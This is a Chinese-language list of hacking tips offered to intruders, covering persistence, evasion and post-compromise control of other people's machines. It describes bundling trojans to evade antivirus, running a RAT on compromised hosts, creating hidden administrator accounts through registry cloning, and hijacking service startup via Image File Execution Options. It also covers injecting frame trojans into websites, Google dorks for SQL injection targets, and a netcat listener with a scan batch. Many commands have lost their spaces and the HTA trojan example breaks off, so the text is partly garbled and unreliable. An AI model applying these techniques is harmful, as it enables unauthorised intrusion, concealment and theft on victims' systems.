关于入侵的一些内容.docxVIP

关于入侵的一些内容

1、Xp系统修改权限防止病毒或木马等破坏系统，cmd下，

caclsC:\windows\system32/Ghqw20:R

思是给hqw20这个用户只能读取SYSTEM32目录，但不能进行修改或写入

恢复方法：C:\caclsC:\windows\system32/Ghqw20:F

2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件，运行对话框中输入Iexpress。

3、内网使用灰鸽子，肉鸡上vidcs.exe-p端口，本地VIDCS里，VIDCS服务IP填肉鸡的IP，VIDCS服务端口，就是给肉鸡开的端口，BINDIP添自己的内网IP，BIND端口添8000，映射端口添8000。

4、建立隐藏帐号，上次总结了用guest建立隐藏的管理员，这次再介绍一种，在cmd下建立一个ating$的用户，然后注册表下复制管理员的1F4里的F值到ating$的F值，再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号

5、利用INF文件来修改注册表

[Version]

Signature=$CHICAGO$

[Defaultinstall]

addREG=Ating

[Ating]

HKCU,Software\Microsoft\Windows\CurrentVersion\Policies\system,disableregistrytools,01

以上代码保存为inf格式，注意没有换行符，在命令行里导入inf的命令如下：

rundll32.exesetupapi.dll,InstallHinfSectionDefaultInstall128inf文件的具体路径

其中HKEY_CLASSES_ROOT简写为HKCR，HKEY_CURRENT_USER简写为HKCU

HKEY_LOCAL_MACHINE简写为HKLM，HKEY_USERS简写为HKU

HKEY_CURRENT_CONFIG简写为HKCC

0代表的是字符串值，0代表的是DWORD值

1这里代表是写入或删除注册表键值中的具体数据

6、关于制作穿xp2防火墙的radmin，大家一定要会，各大黑客网站都有动画,

多了一步就是在防火墙里添加个端口，然后导出其键值

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]

7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽

在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\ImageFileExecutionOptions]下建立service.exe项，再在service.exe项建立一个Debugger的键（字符串值），键值填ating.exe的全路径。

8、将ftp.exe传到服务器用来提权，可以先把它变成ating.gif格式的再用，迷惑管理员。

9、有时候在我们进入了网站后台，但是没有上传图片和备份等功能，得不到webshell,

可是不能白来一场，可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。

10、用google帮我们找网站后台,搜索”filetype:aspsite:inurl:login”

11、我们中了盗密码的木马后不要急于删除，一般这些木马都是把密码发到指定邮箱，我们可以用探嗅软件来找到邮箱的用户名和密码，比如安全焦点的xsniff，

用法：xsniff–pass–hide–logpass.txt

12、google搜索的艺术

搜索关键字：“未闭合的引号”或“ADODB.Field.error”或“EitherBOForEOFinTrue”

或“字符串的语法错误”可以找到很多sql注入漏洞。

13、还可以搜一些木马的关键字，比如搜索“管理登陆海洋顶端inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。

14、cmd中输入nc–vv–l–p1987

做个bat文件内容为sqlhello起始ip1433终止ip1987扫鸡吃

15、制作T++木马，先写个ating.hta文件,内容为

scriptlanguage=VBScript

setwshshell=createobject(wscript.shell)

a=wshsh